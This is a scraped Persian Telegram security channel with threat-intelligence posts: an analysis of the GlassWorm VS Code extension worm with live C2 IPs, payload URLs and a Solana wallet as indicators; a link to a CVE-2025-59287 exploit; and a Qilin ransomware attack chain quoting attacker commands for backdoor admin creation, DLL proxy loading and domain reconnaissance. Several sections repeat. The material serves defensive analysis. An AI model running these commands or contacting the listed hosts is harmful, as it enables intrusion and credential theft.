لایه ۱: C2 اولیه مبتنی بر بلاکچین Solana
بدافزار پس از اجرا، یک آدرس کیف پول (Wallet Address) هاردکد شده در بلاکچین Solana را جستجو میکند. سپس، تراکنشهای مرتبط با این کیف پول را برای یافتن فیلد memo بررسی میکند.
مهاجمان URL دانلود payload مرحله بعد را در قالب یک آبجکت JSON (به صورت Base64-encoded) در فیلد memo یک تراکنش ثبت کردهاند.
چرا این تکنیک ویرانگر است؟
* تغییرناپذیری (Immutability): پس از ثبت تراکنش در بلاکچین، امکان حذف یا تغییر آن وجود ندارد. هیچ ارائهدهنده هاستینگ یا ثبتکننده دامنهای برای ارسال درخواست Takedown وجود ندارد.
* ناشناسی (Anonymity): کیف پولهای کریپتو، ناشناسی بالایی را فراهم میکنند.
* مقاومت در برابر سانسور: زیرساخت غیرمتمرکز است و نمیتوان آن را خاموش کرد.
* پویایی: مهاجم میتواند با ارسال یک تراکنش جدید (با هزینهای کمتر از یک سنت)، آدرس IP یا دامنه payload سرور خود را بهروزرسانی کند و تمام قربانیان به طور خودکار به آدرس جدید هدایت میشوند.
لایه ۲: C2 پشتیبان مبتنی بر Google Calendar
به عنوان یک مکانیزم پشتیبان هوشمندانه، بدافزار به یک رویداد Google Calendar عمومی دسترسی پیدا میکند. مهاجم URL دانلود payload (این بار با مسیر
get_zombi_payload/) را به صورت Base64 در عنوان (Title) این رویداد تقویم ذخیره کرده است.از آنجایی که ترافیک به دامنههای گوگل (calendar.app.google) کاملاً قانونی تلقی میشود، این ارتباط از دید اکثر ابزارهای امنیتی شبکه پنهان میماند.
لایه ۳: تحویل Payload
پیلود مرحله بعد (که از آدرس بهدستآمده از Solana یا Google Calendar دانلود میشود) با AES-256-CBC رمزنگاری شده است. نکته هوشمندانه اینجاست که کلید رمزگشایی (Decryption Key) در داخل payload نیست، بلکه در هدرهای سفارشی (Custom HTTP Headers) پاسخ سرور C2 ارسال میشود. این کار تحلیل خودکار ترافیک شبکه را دشوارتر میکند.
تحلیل Payload نهایی: ماژول "ZOMBI"
این Payload نهایی که "ZOMBI" نامگذاری شده است، یک RAT بسیار پیشرفته با قابلیتهای زیر است که ماشین توسعهدهنده را به یک "سرباز زامبی" در باتنت مهاجم تبدیل میکند:
Please open Telegram to view this post
VIEW IN TELEGRAM
Mr. SAM
1. سرقت گسترده اعتبارنامهها (Credential Harvesting):
* توکنهای احراز هویت NPM
* توکنهای GitHub و OpenVSX
* اعتبارنامههای Git
* هدف قرار دادن ۴۹ افزونه مختلف کیف پول رمزارز (از جمله MetaMask, Phantom, Coinbase Wallet و ...) برای تخلیه داراییها.
2. ایجاد SOCKS Proxy:
* خطرناکترین قابلیت این ماژول، تبدیل سیستم قربانی به یک SOCKS Proxy Server است.
* این به مهاجم اجازه میدهد تا ترافیک مجرمانه خود را از طریق ماشین قربانی (که اغلب در داخل یک شبکه سازمانی و پشت فایروالها قرار دارد) مسیریابی کند. این امکان Pivoting به درون شبکه داخلی سازمان، ناشناسسازی حملات و دور زدن کنترلهای امنیتی را فراهم میآورد.
3. کنترل P2P از طریق WebRTC:
* استفاده از ماژولهای WebRTC برای ایجاد کانالهای ارتباطی Peer-to-Peer مستقیم با قربانی. این تکنیک با استفاده از NAT Traversal**، فایروالهای سنتی را دور زده و امکان کنترل مستقیم و آنی را فراهم میکند.
4. **توزیع فرمان از طریق BitTorrent DHT:
* استفاده از Distributed Hash Table (DHT) شبکه BitTorrent برای توزیع دستورات. این یک مکانیزم C2 کاملاً غیرمتمرکز دیگر است که هیچ سرور مرکزی برای شناسایی و مسدودسازی ندارد.
5. دسترسی ریموت پنهان (HVNC):
* بدافزار یک سرور Hidden VNC راهاندازی میکند. برخلاف VNC استاندارد، HVNC در یک دسکتاپ مجازی پنهان اجرا میشود که در Task Manager یا روی صفحه نمایش قربانی قابل مشاهده نیست.
* مهاجم میتواند به طور کامل و نامرئی با دسکتاپ قربانی کار کند، به سشنهای لاگینشده (ایمیل، Slack، ابزارهای داخلی) دسترسی یابد، سورس کدها را بخواند و به سیستمهای دیگر در شبکه داخلی حمله کند.
مکانیزم انتشار (Worm)
بدافزار GlassWorm نام خود را به عنوان یک "کرم" از قابلیت خود-تکثیریاش گرفته است. این بدافزار از اعتبارنامههای سرقترفته (NPM, GitHub, OpenVSX) استفاده میکند تا به صورت خودکار به پکیجها و افزونههای دیگری که توسعهدهنده قربانی به آنها دسترسی دارد، نفوذ کند، کد نامرئی خود را تزریق کرده و نسخههای مخرب جدیدی منتشر کند.
این چرخه به صورت نمایی (Exponential) رشد میکند و هر قربانی جدید، خود به یک نقطه انتشار جدید تبدیل میشود.
### شاخصهای کلیدی نفوذ (IOCs)
افزونههای آلوده (OpenVSX و VSCode):
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
زیرساخت شبکه و بلاکچین:
* IP سرور C2 اولیه:
* IP سرور Exfiltration داده:
* آدرس کیف پول Solana (C2):
* تراکنش نمونه (C2):
* آدرس Google Calendar (C2):
* ایمیل سازماندهنده Calendar:
#### Payload URLs:
*
*
*
شاخصهای Persistence در رجیستری (ویندوز):
*
*
@NullError_ir
* توکنهای احراز هویت NPM
* توکنهای GitHub و OpenVSX
* اعتبارنامههای Git
* هدف قرار دادن ۴۹ افزونه مختلف کیف پول رمزارز (از جمله MetaMask, Phantom, Coinbase Wallet و ...) برای تخلیه داراییها.
2. ایجاد SOCKS Proxy:
* خطرناکترین قابلیت این ماژول، تبدیل سیستم قربانی به یک SOCKS Proxy Server است.
* این به مهاجم اجازه میدهد تا ترافیک مجرمانه خود را از طریق ماشین قربانی (که اغلب در داخل یک شبکه سازمانی و پشت فایروالها قرار دارد) مسیریابی کند. این امکان Pivoting به درون شبکه داخلی سازمان، ناشناسسازی حملات و دور زدن کنترلهای امنیتی را فراهم میآورد.
3. کنترل P2P از طریق WebRTC:
* استفاده از ماژولهای WebRTC برای ایجاد کانالهای ارتباطی Peer-to-Peer مستقیم با قربانی. این تکنیک با استفاده از NAT Traversal**، فایروالهای سنتی را دور زده و امکان کنترل مستقیم و آنی را فراهم میکند.
4. **توزیع فرمان از طریق BitTorrent DHT:
* استفاده از Distributed Hash Table (DHT) شبکه BitTorrent برای توزیع دستورات. این یک مکانیزم C2 کاملاً غیرمتمرکز دیگر است که هیچ سرور مرکزی برای شناسایی و مسدودسازی ندارد.
5. دسترسی ریموت پنهان (HVNC):
* بدافزار یک سرور Hidden VNC راهاندازی میکند. برخلاف VNC استاندارد، HVNC در یک دسکتاپ مجازی پنهان اجرا میشود که در Task Manager یا روی صفحه نمایش قربانی قابل مشاهده نیست.
* مهاجم میتواند به طور کامل و نامرئی با دسکتاپ قربانی کار کند، به سشنهای لاگینشده (ایمیل، Slack، ابزارهای داخلی) دسترسی یابد، سورس کدها را بخواند و به سیستمهای دیگر در شبکه داخلی حمله کند.
مکانیزم انتشار (Worm)
بدافزار GlassWorm نام خود را به عنوان یک "کرم" از قابلیت خود-تکثیریاش گرفته است. این بدافزار از اعتبارنامههای سرقترفته (NPM, GitHub, OpenVSX) استفاده میکند تا به صورت خودکار به پکیجها و افزونههای دیگری که توسعهدهنده قربانی به آنها دسترسی دارد، نفوذ کند، کد نامرئی خود را تزریق کرده و نسخههای مخرب جدیدی منتشر کند.
این چرخه به صورت نمایی (Exponential) رشد میکند و هر قربانی جدید، خود به یک نقطه انتشار جدید تبدیل میشود.
### شاخصهای کلیدی نفوذ (IOCs)
افزونههای آلوده (OpenVSX و VSCode):
*
codejoy.codejoy-vscode-extension@1.8.3*
codejoy.codejoy-vscode-extension@1.8.4*
l-igh-t.vscode-theme-seti-folder@1.2.3*
kleinesfilmroellchen.serenity-dsl-syntaxhighlight@0.3.2*
JScearcy.rust-doc-viewer@4.2.1*
SIRILMP.dark-theme-sm@3.11.4*
CodeInKlingon.git-worktree-menu@1.0.9*
CodeInKlingon.git-worktree-menu@1.0.91*
ginfuru.better-nunjucks@0.3.2*
ellacrity.recoil@0.7.4*
grrrck.positron-plus-1-e@0.0.71*
jeronimoekerdt.color-picker-universal@2.8.91*
srcery-colors.srcery-colors@0.3.9*
sissel.shopify-liquid@4.0.1*
TretinV3.forts-api-extention@0.3.1*
cline-ai-main.cline-ai-agent@3.1.3 (Microsoft VSCode Marketplace)زیرساخت شبکه و بلاکچین:
* IP سرور C2 اولیه:
217.69.3.218* IP سرور Exfiltration داده:
140.82.52.31:80/wall* آدرس کیف پول Solana (C2):
28PKnu7RzizxBzFPoLp69HLXp9bJL3JFtT2s5QzHsEA2* تراکنش نمونه (C2):
49CDiVWZpuSW1b2HpzweMgePNg15dckgmqrrmpihYXJMYRsZvumVtFsDim1keESPCrKcW2CzYjN3nSQDGG14KKFM* آدرس Google Calendar (C2):
https://calendar.app.google/M2ZCvM8ULL56PD1d6* ایمیل سازماندهنده Calendar:
uhjdclolkdn@gmail.com#### Payload URLs:
*
http://217.69.3.218/qQD%2FJoi3WCWSk8ggGHiTdg%3D%3D*
http://217.69.3.218/get_arhive_npm/*
http://217.69.3.218/get_zombi_payload/qQD%2FJoi3WCWSk8ggGHiTdg%3D%3Dشاخصهای Persistence در رجیستری (ویندوز):
*
HKCU\Software\Microsoft\Windows\CurrentVersion\Run*
HKLM\Software\Microsoft\Windows\CurrentVersion\Run@NullError_ir
Mr. SAM
1. سرقت گسترده اعتبارنامهها (Credential Harvesting): * توکنهای احراز هویت NPM * توکنهای GitHub و OpenVSX * اعتبارنامههای Git * هدف قرار دادن ۴۹ افزونه مختلف کیف پول رمزارز (از جمله MetaMask, Phantom, Coinbase Wallet و ...) برای تخلیه داراییها.…
Poc.js
5.8 KB
این هم یک مثال واقعی از کاراکترهای نامرئی که یک محقق به صورت چشمی نمیتونه چیزی ببینه ولی درواقع شامل دستورات هست .
هم در مرورگر و هم در node قابل اجراست .
در مرورگر یک alert به شما نشون میده و در ترمینال node دستور ls اجرا میشه .
@NullError_ir
هم در مرورگر و هم در node قابل اجراست .
در مرورگر یک alert به شما نشون میده و در ترمینال node دستور ls اجرا میشه .
@NullError_ir
اکسپلویت آسیب پذیری در ویندوز سرور
این آسیب پذیری به مهاجمان اجازه میدهد تا کد دلخواه را با امتیازات سطح سیستم از طریق شبکه اجرا کنند و بهطور بالقوه کل زیرساختهای فناوری اطلاعات را به خطر بیندازند .
ویندوز سرور ۲۰۱۲
ویندوز سرور ۲۰۱۲ R2
ویندوز سرور ۲۰۱۶
ویندوز سرور ۲۰۱۹
ویندوز سرور ۲۰۲۲
ویندوز سرور ۲۰۲۲، نسخه ۲۳H2
ویندوز سرور ۲۰۲۵
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
Gist
CVE-2025-59287
CVE-2025-59287. GitHub Gist: instantly share code, notes, and snippets.
کشف یک کمپین باجافزاری پیچیده
باجافزار Agenda (Qilin)
این حمله نشاندهنده یک تاکتیک بسیار پیشرفته و نگرانکننده است: استقرار و اجرای مستقیم یک باینری باجافزار مبتنی بر لینوکس بر روی سیستمهای میزبان ویندوزی . این رویکرد اجرای بین-پلتفرمی (Cross-Platform Execution)، بسیاری از راهحلهای امنیتی مرسوم متمرکز بر ویندوز، از جمله پلتفرمهای EDR، را دور میزند.
نکات کلیدی و یافتههای اصلی
* گروه عامل: Agenda (شناختهشده با نام Qilin)، یک عملیات باجافزار به عنوان سرویس (RaaS).
* تکنیک اصلی: اجرای باینری لینوکس بر روی ویندوز با سوءاستفاده از ابزارهای قانونی مدیریت از راه دور (RMM) و انتقال فایل.
۔ ابزارهای قانونی مورد سوءاستفاده:
۔ WinSCP: برای انتقال امن باینری لینوکس به میزبان ویندوزی.
۔ Splashtop Remote: برای اجرای مستقیم باینری لینوکس روی ویندوز.
۔ ATERA Networks (RMM): برای نصب AnyDesk.
۔ ScreenConnect: برای اجرای دستورات شناسایی.
* تاکتیکهای فرار از دفاع: استفاده از حمله BYOVD (Bring Your Own Vulnerable Driver) برای خنثیسازی ابزارهای امنیتی (AV/EDR).
* هدف اصلی: زیرساختهای پشتیبانگیری Veeam برای سرقت سیستماتیک اعتبارنامهها و حذف گزینههای بازیابی.
* قربانیشناسی: از ژانویه ۲۰۲۵، بیش از ۷۰۰ قربانی در ۶۲ کشور، با تمرکز بر بازارهای توسعهیافته (ایالات متحده، فرانسه، کانادا، بریتانیا) و صنایع با ارزش بالا (تولید، فناوری، خدمات مالی، مراقبتهای بهداشتی).
زنجیره حمله (Attack Chain) به صورت دقیق
زنجیره حمله این گروه بسیار پیچیده و چند مرحلهای است و بر پنهانکاری از طریق ابزارهای قانونی (Living-off-the-Land) و تکنیکهای پیشرفته فرار از دفاع متمرکز است.
# ۱. دسترسی اولیه (Initial Access)
* مهاجمان از طریق یک کمپین مهندسی اجتماعی پیچیده با استفاده از صفحات جعلی CAPTCHA که بر روی زیرساخت ذخیرهسازی Cloudflare R2 میزبانی شدهاند، نفوذ اولیه را به دست میآورند.
* این صفحات، کدهای جاوا اسکریپت مبهمسازیشدهای را اجرا میکنند که منجر به دانلود Information Stealer (سارق اطلاعات) بر روی سیستم قربانی میشود.
* این بدافزار، توکنهای احراز هویت، کوکیهای مرورگر و اعتبارنامههای ذخیرهشده را برداشت میکند.
* داشتن این اعتبارنامههای معتبر به مهاجمان اجازه میدهد تا MFA (احراز هویت چندعاملی) را دور بزنند و با استفاده از نشستهای (Sessions) کاربری قانونی، در شبکه حرکت جانبی کنند.
# ۲. ارتقای سطح دسترسی (Privilege Escalation)
* پس از نفوذ، مهاجمان یک SOCKS proxy DLL (مانند
socks64.dll) را مستقر میکنند.* این DLL مستقیماً با استفاده از فرآیند قانونی ویندوز (
rundll32.exe socks64.dll,rundll) در حافظه بارگذاری میشود تا شناسایی آن دشوارتر گردد.* یک حساب کاربری ادمین پشتیبان (Backdoor) با نامی موجه مانند "Supportt" ایجاد میشود (
net user Supportt ... /add و net localgroup Administrators Supportt /add).* همچنین رمز عبور حساب Administrator قانونی سیستم نیز تغییر داده میشود تا کنترل کامل حفظ گردد.
# ۳. شناسایی و نصب RMM (Discovery & RMM Installation)
* مهاجمان به طور گسترده از ابزارهای RMM قانونی برای شناسایی شبکه سوءاستفاده میکنند:
* با استفاده از ScreenConnect ، اسکریپتهای فرمان موقتی را برای شمارش Domain Trusts (
nltest /domain_trusts ) و شناسایی ادمینهای دامنه ( net group "domain admins" /domain ) اجرا میکنند.* از ابزار NetScan برای اسکن جامع شبکه استفاده میکنند.
* آنها از ایجنت ATERA Networks برای نصب AnyDesk (نسخه ۹.۰.۵) بهره میبرند.
* استفاده همزمان از ATERA، AnyDesk و ScreenConnect به آنها قابلیتهای دسترسی از راه دور اضافی و قانونی (از دید سیستمهای مانیتورینگ) میدهد.
# ۴. دسترسی به اعتبارنامهها (Credential Access)
* این مرحله یکی از حیاتیترین بخشهای حمله است. مهاجمان به طور خاص زیرساخت پشتیبانگیری Veeam را هدف قرار میدهند.
* آنها اسکریپتهای PowerShell با پیلودهای Base64-encoded را اجرا میکنند.
* این اسکریپتها مستقیماً دیتابیسهای SQL سرور Veeam را هدف قرار میدهند (مانند
[VeeamBackup].[dbo].[Credentials]) تا اعتبارنامههای ذخیرهشده را استخراج و رمزگشایی کنند.* از این طریق، آنها به مجموعهای جامع از اعتبارنامههای حساس، از جمله ادمینهای دامنه، حسابهای سرویس (svc-sql-*** , DOMAIN\veeam-svc-*** ) و ادمینهای محلی سرورهای حیاتی (کنترلرهای دامنه، سرورهای Exchange ، پایگاههای داده) دست مییابند.
Please open Telegram to view this post
VIEW IN TELEGRAM